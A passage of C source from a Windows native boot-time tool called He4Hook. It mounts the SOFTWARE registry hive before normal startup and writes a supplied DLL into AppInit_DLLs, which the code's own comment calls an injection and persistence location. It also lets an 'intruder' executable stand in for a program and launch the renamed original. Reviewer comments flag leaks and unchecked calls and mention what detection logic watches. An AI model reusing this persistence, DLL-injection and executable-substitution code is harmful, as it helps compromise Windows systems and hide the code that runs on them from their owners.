#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n Class He4NDISBootDriver don`t created !!!");
}
#endif //__HE4_BOOT_DEBUG
#endif //__HE4_BOOT_INSTALL_NDIS
}
/*
 * Register pDLLName as the AppInit_DLLs value of
 * \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
 * while the system is still running in native (boot-time) mode.
 *
 * The routine mounts the SOFTWARE hive itself (presumably because it is not
 * loaded yet at this stage): it resolves "<windir>\system32\config\software"
 * from the PEB environment (default: c:\winnt\...), attaches it beneath HKLM
 * with NtLoadKey, writes the REG_SZ value, and detaches it again with
 * NtUnloadKey.
 *
 * pDLLName: wide string stored verbatim as the value data; NULL returns.
 * Peb:      process environment block used to look up "windir"; may be NULL,
 *           in which case the hard-coded default path is used.
 *
 * AppInit_DLLs is a well-known user-mode injection / persistence location;
 * detection logic commonly watches writes to this value and hive loads that
 * happen outside the normal boot path.
 *
 * NOTE(review): KeyFile (allocated by RtlDosPathNameToNtPathName_U) is never
 * released; the results of RtlAdjustPrivilege and RtlDosPathNameToNtPathName_U
 * are not checked; two of the error returns below leave the hive mounted.
 */
void InstallHookDLL(PWSTR pDLLName, PPEB Peb)
{
UNICODE_STRING str, GroupValue, KeyFile, UniWinDir;
NTSTATUS NtStatus;
HANDLE hKey/*, hKeyLoad*/;
OBJECT_ATTRIBUTES obj, KeyObj;
ULONG Disposition/*, dwData*/;
BOOLEAN bEnable;
/* Hive file path used when "windir" cannot be read from the PEB. */
WCHAR DosPathToKeyFile[512] = L"c:\\winnt\\system32\\config\\software";
WCHAR WinDir[512];
if(!pDLLName)
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key Dll name is NULL !!!");
#endif //__HE4_BOOT_DEBUG
return;
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook key Dll name is ");
BEDisplayString(pDLLName);
BEDisplayString(L" !!!");
}
#endif //__HE4_BOOT_DEBUG
/* Replace the default path with "<windir>\system32\config\software" when the
 * environment block provides "windir".  The DEBUG and non-DEBUG branches
 * perform the same copy; only the console output differs.
 * NOTE(review): nothing checks that UniWinDir.Length plus the suffix fits in
 * DosPathToKeyFile (both buffers are 512 WCHARs). */
if(Peb)
{
RtlInitUnicodeString(&str, L"windir");
//RtlInitUnicodeString(&UniWinDir, L" ");
UniWinDir.Buffer = WinDir;
UniWinDir.Length = 0;
UniWinDir.MaximumLength = sizeof(WinDir);
if(Peb->pi->EnvironmentBlock)
{
NtStatus = RtlQueryEnvironmentVariable_U(Peb->pi->EnvironmentBlock, &str, &UniWinDir);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - WINDIR not found into EnvironmentBlock!!!");
}
else
{
BEDisplayString(L"\n ");
NtDisplayString(&UniWinDir);
memset(DosPathToKeyFile, 0, sizeof(DosPathToKeyFile));
memcpy(DosPathToKeyFile, UniWinDir.Buffer, UniWinDir.Length);
memcpy(((CHAR*)DosPathToKeyFile)+UniWinDir.Length, L"\\system32\\config\\software", sizeof(L"\\system32\\config\\software"));
BEDisplayString(L"\n ");
BEDisplayString(DosPathToKeyFile);
}
#else
if(NT_SUCCESS(NtStatus))
{
memset(DosPathToKeyFile, 0, sizeof(DosPathToKeyFile));
memcpy(DosPathToKeyFile, UniWinDir.Buffer, UniWinDir.Length);
memcpy(((CHAR*)DosPathToKeyFile)+UniWinDir.Length, L"\\system32\\config\\software", sizeof(L"\\system32\\config\\software"));
}
#endif //__HE4_BOOT_DEBUG
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook - EnvironmentBlock is NULL!!!");
}
#endif //__HE4_BOOT_DEBUG
}
/* Open HKLM; the hive is attached beneath it as a relative key below. */
RtlInitUnicodeString(&str, L"\\Registry\\Machine");
InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtStatus = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obj);
if(!NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key \\Registry\\Machine for DLL don`t opened !!!");
#endif //__HE4_BOOT_DEBUG
return;
}
/* SeRestorePrivilege is required for NtLoadKey/NtUnloadKey; result unchecked. */
RtlAdjustPrivilege(SE_RESTORE_PRIVILEGE, TRUE, FALSE, &bEnable);
/* Heap-allocated NT path of the hive file.  NOTE(review): never freed. */
RtlDosPathNameToNtPathName_U(DosPathToKeyFile, &KeyFile, NULL, NULL);
InitializeObjectAttributes(&obj, &KeyFile, OBJ_CASE_INSENSITIVE, NULL, NULL);
RtlInitUnicodeString(&str, L"SOFTWARE");
/* KeyObj is relative to hKey, i.e. the hive appears as \Registry\Machine\SOFTWARE. */
InitializeObjectAttributes(&KeyObj, &str, OBJ_CASE_INSENSITIVE, hKey, NULL);
NtStatus = NtLoadKey(&KeyObj, &obj);
if(!NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key \\Registry\\Machine\\SOFTWARE for DLL don`t loaded !!!");
#endif //__HE4_BOOT_DEBUG
NtClose(hKey);
return;
}
NtClose(hKey);
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key \\Registry\\Machine\\SOFTWARE for DLL loaded OK!!!");
#endif //__HE4_BOOT_DEBUG
/************************************************************************/
/* Open (or create, volatile) the key that holds AppInit_DLLs.  Disposition
 * is not examined.  NOTE(review): on failure the hive loaded above stays
 * mounted. */
RtlInitUnicodeString(&str, L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows");
InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtStatus = NtCreateKey(&hKey, KEY_ALL_ACCESS, &obj, 0, NULL, REG_OPTION_VOLATILE, &Disposition);
if(!NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key for DLL don`t created !!!");
#endif //__HE4_BOOT_DEBUG
return;
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook key for DLL created !!!");
}
#endif //__HE4_BOOT_DEBUG
/* REG_SZ data: the DLL name plus its NUL terminator. */
RtlInitUnicodeString(&str, L"AppInit_DLLs");
RtlInitUnicodeString(&GroupValue, pDLLName);//L"HookKey.dll");
NtStatus = NtSetValueKey(hKey, &str, 0, REG_SZ, GroupValue.Buffer, GroupValue.Length+sizeof(WCHAR));
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - \"AppInit_DLLs: HookKey.dll\" set value ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - \"AppInit_DLLs: HookKey.dll\" set value OK!!!");
}
#endif //__HE4_BOOT_DEBUG
NtClose(hKey);
/* Re-open HKLM and detach the hive again.  NOTE(review): if this NtOpenKey
 * fails the function returns with the hive still loaded. */
RtlInitUnicodeString(&str, L"\\Registry\\Machine");
InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtStatus = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obj);
if(!NT_SUCCESS(NtStatus))
{
return;
}
RtlAdjustPrivilege(SE_RESTORE_PRIVILEGE, TRUE, FALSE, &bEnable);
RtlInitUnicodeString(&str, L"SOFTWARE");
InitializeObjectAttributes(&KeyObj, &str, OBJ_CASE_INSENSITIVE, hKey, NULL);
NtStatus = NtUnloadKey(&KeyObj);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - NtUnloadKey ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - NtUnloadKey OK!!!");
}
#endif //__HE4_BOOT_DEBUG
NtClose(hKey);
}
/*
 * Print a NUL-terminated wide string on the boot console and mirror it into
 * the log file.  A NULL pointer is ignored.
 *
 * lpszString: wide string to print; the bytes handed to WriteLog cover the
 *             string plus its terminating NUL (2 * (wcslen + 1) bytes).
 */
VOID BEDisplayString(PWSTR lpszString)
{
    UNICODE_STRING text;
    ULONG logBytes;

    if (lpszString == NULL) {
        return;
    }
    RtlInitUnicodeString(&text, lpszString);
    NtDisplayString(&text);
    /* The log copy includes the terminator, as the console path does not. */
    logBytes = (ULONG)(2 * (wcslen(lpszString) + 1));
    WriteLog(lpszString, logBytes);
}
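/*
 * Terminate the calling process, mirroring the sequence ntdll uses: take the
 * PEB lock, terminate the other threads (NtTerminateProcess with a NULL
 * handle), run the loader's process-shutdown notifications, then terminate
 * the process itself.  Control normally never returns from the second
 * NtTerminateProcess; the trailing code only runs if that call fails.
 *
 * ExitCode: exit status handed to NtTerminateProcess.
 */
VOID RtlExitUserProcess(ULONG ExitCode)
{
    RtlAcquirePebLock();
    /* NULL handle: terminate every thread except the caller. */
    NtTerminateProcess(0, ExitCode);
    LdrShutdownProcess();
    /* (HANDLE)-1 is the current-process pseudo handle for any pointer
     * width; the former (HANDLE)0xffffffff is only equal to it when HANDLE
     * is 32 bits wide.  Same spelling as NtAllocateVirtualMemory's caller
     * in StartRealProcess. */
    NtTerminateProcess((HANDLE)-1, ExitCode);
#ifdef __HE4_BOOT_DEBUG
    BEDisplayString(L"\n RtlExitUserProcess ERROR");
#endif //__HE4_BOOT_DEBUG
    RtlReleasePebLock();
}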
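/*
 * Return TRUE when lpszFileName can be opened for reading, FALSE otherwise.
 *
 * lpszFileName: wide, NUL-terminated DOS path or bare file name; NULL -> FALSE.
 * bFullName:    TRUE  - lpszFileName is used as given.
 *               FALSE - it is prefixed with "<system directory>\" as returned
 *                       by GetSystemDirectory(); if that lookup yields nothing
 *                       the name is used as given.
 *
 * Every copy into FullFileName is bounded: a name that does not fit in the
 * 512-WCHAR buffer (terminator included) is reported as non-existent instead
 * of overrunning the stack.  The NT path allocated by
 * RtlDosPathNameToNtPathName_U is released before returning.
 */
BOOLEAN CheckFileExist(PWSTR lpszFileName, BOOLEAN bFullName)
{
    WCHAR FullFileName[512] = {0};
    UNICODE_STRING FileNameUnicodeString;
    OBJECT_ATTRIBUTES objectAttributes;
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS ntStatus;
    HANDLE hFile;
    BOOLEAN bRet = FALSE;
    ULONG NameBytes;     /* lpszFileName length in bytes, terminator excluded */
    ULONG DirBytes = 0;  /* system directory length in bytes, terminator excluded */
    /* Bytes usable for characters; one WCHAR is reserved for the NUL. */
    const ULONG Capacity = sizeof(FullFileName) - sizeof(WCHAR);

    if (lpszFileName == NULL) {
        return FALSE;
    }
    NameBytes = (ULONG)(wcslen(lpszFileName) * sizeof(WCHAR));

    if (bFullName) {
        if (NameBytes > Capacity) {
            return FALSE;
        }
        memcpy(FullFileName, lpszFileName, NameBytes + sizeof(WCHAR));
    } else {
        DirBytes = GetSystemDirectory(FullFileName, sizeof(FullFileName));
        if (DirBytes) {
            /* "<dir>" + "\" + "<name>" must fit together with the terminator. */
            if (DirBytes + sizeof(WCHAR) + NameBytes > Capacity) {
                return FALSE;
            }
            memcpy((CHAR*)FullFileName + DirBytes, L"\\", sizeof(L"\\"));
            memcpy((CHAR*)FullFileName + DirBytes + sizeof(WCHAR), lpszFileName, NameBytes + sizeof(WCHAR));
#ifdef __HE4_BOOT_DEBUG
            BEDisplayString(L"\n\n WindowsDirectory: \n");
            BEDisplayString(FullFileName);
            BEDisplayString(L"\n\n");
#endif //__HE4_BOOT_DEBUG
        } else {
            if (NameBytes > Capacity) {
                return FALSE;
            }
            memcpy(FullFileName, lpszFileName, NameBytes + sizeof(WCHAR));
        }
    }

    /* DOS path -> NT path; the result is heap-allocated and freed below. */
    if (!RtlDosPathNameToNtPathName_U(FullFileName, &FileNameUnicodeString, NULL, NULL)) {
        return FALSE;
    }
#ifdef __HE4_BOOT_DEBUG
    BEDisplayString(L" WindowsDirectoryUNI: \n");
    NtDisplayString(&FileNameUnicodeString);
    BEDisplayString(L"\n\n");
#endif //__HE4_BOOT_DEBUG
    InitializeObjectAttributes(&objectAttributes, &FileNameUnicodeString,
                               OBJ_CASE_INSENSITIVE, NULL, NULL);
    /* FILE_OPEN: never creates; success means the file is there and readable. */
    ntStatus = NtCreateFile(&hFile, FILE_READ_DATA,
                            &objectAttributes, &ioStatus, NULL,
                            FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,
                            FILE_OPEN, 0, NULL, 0);
    if (NT_SUCCESS(ntStatus)) {
        bRet = TRUE;
        NtClose(hFile);
    }
    RtlFreeUnicodeString(&FileNameUnicodeString);
    return bRet;
}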
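/*
 * Open (or create) the boot log "He4Boot.log", relative to the current
 * directory, and store its handle in the file-scope hFileLog.  Calling it
 * while the log is already open is a no-op.  Failures are silent: hFileLog
 * stays 0 and WriteLog then has nothing to write to.
 *
 * NOTE(review): FILE_OPEN_IF keeps an existing file's contents and WriteLog
 * passes no byte offset, so a pre-existing log is overwritten from its start
 * rather than truncated or appended to -- presumably unintended;
 * FILE_OVERWRITE_IF (or FILE_APPEND_DATA access) would be the usual choice.
 */
void OpenLog(void)
{
    UNICODE_STRING FileNameUnicodeString;
    OBJECT_ATTRIBUTES objectAttributes;
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;

    if (hFileLog != 0) {
        return;
    }
    /* DOS name -> NT path; the result is heap-allocated and freed below. */
    if (!RtlDosPathNameToNtPathName_U(L"He4Boot.log", &FileNameUnicodeString, NULL, NULL)) {
        return;
    }
    InitializeObjectAttributes(&objectAttributes, &FileNameUnicodeString,
                               OBJ_CASE_INSENSITIVE, NULL, NULL);
    status = NtCreateFile(&hFileLog, FILE_WRITE_DATA | SYNCHRONIZE,
                          &objectAttributes, &ioStatus, NULL,
                          FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,
                          FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
    RtlFreeUnicodeString(&FileNameUnicodeString);
    if (!NT_SUCCESS(status)) {
        /* Do not rely on the out-parameter's value after a failure. */
        hFileLog = 0;
    }
}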
/* Close the boot log handle, if one is open, and reset hFileLog to 0. */
void CloseLog(void)
{
    HANDLE logHandle = hFileLog;

    hFileLog = 0;
    if (logHandle != 0) {
        NtClose(logHandle);
    }
}
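/*
 * Write raw bytes to the boot log opened by OpenLog(), at the file's
 * current position.
 *
 * pBuffer: bytes to write (BEDisplayString passes UTF-16 text).
 * dwSize:  number of bytes.
 *
 * Best effort: nothing is written while no log is open, and write errors
 * are ignored -- there is nowhere to report them during boot.
 */
void WriteLog(void* pBuffer, ULONG dwSize)
{
    IO_STATUS_BLOCK ioStatus;

    /* Skip the system call when there is no open log or nothing to write. */
    if (hFileLog == 0 || pBuffer == NULL || dwSize == 0) {
        return;
    }
    NtWriteFile(hFileLog, 0, 0, 0, &ioStatus, pBuffer, dwSize, 0, 0);
}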
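/*
 * Copy "<windir>\system32" into lpBuffer as a NUL-terminated wide string and
 * return its length in bytes (terminator excluded), or 0 when the directory
 * could not be determined or the arguments are unusable.
 *
 * lpBuffer: destination buffer of wide characters.
 * uSize:    size of lpBuffer in BYTES (callers pass sizeof(buf)).
 *
 * "windir" is read from the PEB's environment block with
 * RtlQueryEnvironmentVariable_U.  Output is clipped to whole WCHARs, so the
 * result is always terminated and never ends in half a character, and a
 * uSize below sizeof(WCHAR) can no longer underflow the copy size.  lpBuffer
 * is left untouched when nothing was found.
 */
ULONG GetSystemDirectory(PWSTR lpBuffer, ULONG uSize)
{
    static const WCHAR Suffix[] = L"\\system32";
    const ULONG SuffixBytes = sizeof(Suffix) - sizeof(WCHAR);
    PPEB Peb = NtCurrentTeb()->peb;
    UNICODE_STRING str, UniWinDir;
    NTSTATUS NtStatus;
    WCHAR WinDir[512];
    ULONG Capacity;    /* bytes available for characters, terminator excluded */
    ULONG Written = 0; /* bytes placed in lpBuffer so far */
    ULONG Chunk;

    if (!lpBuffer || uSize < sizeof(WCHAR)) {
        return 0;
    }
    /* Round down to whole characters and reserve one for the terminator. */
    Capacity = (uSize / sizeof(WCHAR) - 1) * sizeof(WCHAR);

    if (!Peb) {
        return 0;
    }
    if (!Peb->pi->EnvironmentBlock) {
#ifdef __HE4_BOOT_DEBUG
        BEDisplayString(L"\n He4Hook - EnvironmentBlock is NULL!!!");
#endif //__HE4_BOOT_DEBUG
        return 0;
    }

    RtlInitUnicodeString(&str, L"windir");
    UniWinDir.Buffer = WinDir;
    UniWinDir.Length = 0;
    UniWinDir.MaximumLength = sizeof(WinDir);
    NtStatus = RtlQueryEnvironmentVariable_U(Peb->pi->EnvironmentBlock, &str, &UniWinDir);
    if (!NT_SUCCESS(NtStatus)) {
        return 0;
    }

    memset(lpBuffer, 0, uSize);
    /* Directory part, clipped to whole characters if it does not fit. */
    Chunk = UniWinDir.Length;
    if (Chunk > Capacity) {
        Chunk = Capacity;
    }
    Chunk -= Chunk % sizeof(WCHAR);
    memcpy(lpBuffer, UniWinDir.Buffer, Chunk);
    Written = Chunk;

    /* "\system32" part, clipped the same way. */
    Chunk = SuffixBytes;
    if (Chunk > Capacity - Written) {
        Chunk = Capacity - Written;
    }
    Chunk -= Chunk % sizeof(WCHAR);
    memcpy((CHAR*)lpBuffer + Written, Suffix, Chunk);
    Written += Chunk;

    return Written;
}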
/*
 * Launch the program this boot executable stands in for, and wait for it.
 *
 * The target image name is derived from IntruderProcessName by overwriting
 * its last three characters with "ext" (e.g. "<name>.exe" -> "<name>.ext"),
 * and the same edit is applied to a private copy of the current command
 * line.  RtlCreateUserProcess creates the child with its initial thread
 * suspended; it is resumed with NtResumeThread and the caller blocks until
 * the process exits.
 *
 * IntruderProcessName: wide path of the stand-in executable; NULL returns.
 *
 * NOTE(review): the "-3" offsets assume the command line begins with
 * IntruderProcessName and that both strings are at least three characters
 * long; neither is checked.  pProcessParam, UniProcName and the handles in
 * pi are never released, and the edit at UniDOSProcName.Buffer modifies the
 * caller's IntruderProcessName in place.
 */
void StartRealProcess(PWSTR IntruderProcessName)
{
if(!IntruderProcessName) return;
PPEB Peb = NtCurrentTeb()->peb;
NTSTATUS NtStatus;
PWSTR pCommandLine = 0, pPtrName;
ULONG SizeCommandLine = 0;
PPROCESS_PARAMETRS pProcessParam = 0;
RTL_PROCESS_INFORMATION pi;
UNICODE_STRING UniDOSProcName, UniProcName, UniRealCommandLine;
BOOLEAN bEnable;
/* Presumably converts the offsets in the inherited parameter block into
 * pointers so that CommandLine.Buffer below can be dereferenced. */
RtlNormalizeProcessParams(Peb->pi);
/* Walk back from the terminator to the last '\' so pPtrName points at the
 * file-name component (or at the whole string when there is no '\'). */
pPtrName = IntruderProcessName + wcslen(IntruderProcessName);
while(*pPtrName != L'\\' && pPtrName != IntruderProcessName)
pPtrName--;
if(pPtrName != IntruderProcessName)
pPtrName++;
/* Enabled here but not obviously needed by the calls below; result unchecked. */
RtlAdjustPrivilege(SE_SYSTEM_ENVIRONMENT_PRIVILEGE, TRUE, FALSE, &bEnable);
pCommandLine = 0;
/* Private, NUL-terminated copy of the inherited command line. */
SizeCommandLine = Peb->pi->CommandLine.Length + sizeof(WCHAR);
NtStatus = NtAllocateVirtualMemory((HANDLE)-1, (PVOID*)&pCommandLine, 0, &SizeCommandLine, MEM_COMMIT, PAGE_READWRITE);
if(NT_SUCCESS(NtStatus))
{
memset(pCommandLine, 0, SizeCommandLine);
memcpy(pCommandLine, Peb->pi->CommandLine.Buffer, Peb->pi->CommandLine.Length);
//memcpy(&pCommandLine[wcslen(IntruderProcessName)-5], L"_", 2*wcslen(L"_"));
/* Overwrite the three characters ending at position wcslen(IntruderProcessName)
 * with "ext"; this hits the extension only if the command line starts with
 * IntruderProcessName itself (not checked). */
memcpy(&pCommandLine[wcslen(IntruderProcessName)-3], L"ext", 2*wcslen(L"ext"));
//wcscpy(&pCommandLine[(ULONG)(pPtrName-IntruderProcessName)], L"child.exe");
RtlInitUnicodeString(&UniRealCommandLine, pCommandLine);
/* UniDOSProcName.Buffer aliases pPtrName, i.e. the caller's string. */
RtlInitUnicodeString(&UniDOSProcName, pPtrName); //L"child.exe"
//memcpy(&UniDOSProcName.Buffer[wcslen(IntruderProcessName)-5], L"_", 2*wcslen(L"_"));
memcpy(&UniDOSProcName.Buffer[wcslen(pPtrName)-3], L"ext", 2*wcslen(L"ext"));
/* Bare file name, so the image is resolved relative to the current
 * directory.  NOTE(review): UniProcName is heap-allocated and never freed. */
RtlDosPathNameToNtPathName_U(UniDOSProcName.Buffer, &UniProcName, NULL, NULL);
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n Real DOS process name:\n ");
BEDisplayString(UniDOSProcName.Buffer);
BEDisplayString(L"\n Real process name:\n ");
BEDisplayString(UniProcName.Buffer);
BEDisplayString(L"\n Real command line:\n ");
BEDisplayString(pCommandLine);
#endif //__HE4_BOOT_DEBUG
/* NOTE(review): pProcessParam is never destroyed, and the result of
 * RtlCreateProcessParameters is not checked before use. */
RtlCreateProcessParameters(&pProcessParam, &UniProcName, NULL, NULL,
&UniRealCommandLine, NULL, NULL, NULL, NULL, NULL);
NtStatus = RtlCreateUserProcess(&UniProcName, OBJ_CASE_INSENSITIVE, pProcessParam,
NULL, NULL, NULL, FALSE, NULL, NULL, &pi);
if(NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n RtlCreateUserProcess: OK!!!\n ");
#endif //__HE4_BOOT_DEBUG
/* Start the suspended initial thread, then block until the child exits.
 * NOTE(review): pi.ThreadHandle / pi.ProcessHandle are never closed. */
NtResumeThread(pi.ThreadHandle, NULL);
NtWaitForSingleObject(pi.ProcessHandle, FALSE, NULL);
}
#ifdef __HE4_BOOT_DEBUG
else
{
WCHAR Buf[255];
BEDisplayString(L"\n RtlCreateUserProcess: ERROR!!! ");
swprintf(Buf, L" NtStatus = %08X\n", NtStatus);
BEDisplayString(Buf);
}
#endif //__HE4_BOOT_DEBUG
/* Size 0 with MEM_RELEASE frees the whole region allocated above. */
SizeCommandLine = 0;
NtStatus = NtFreeVirtualMemory((HANDLE)-1, (PVOID*)&pCommandLine, &SizeCommandLine, MEM_RELEASE);
}
}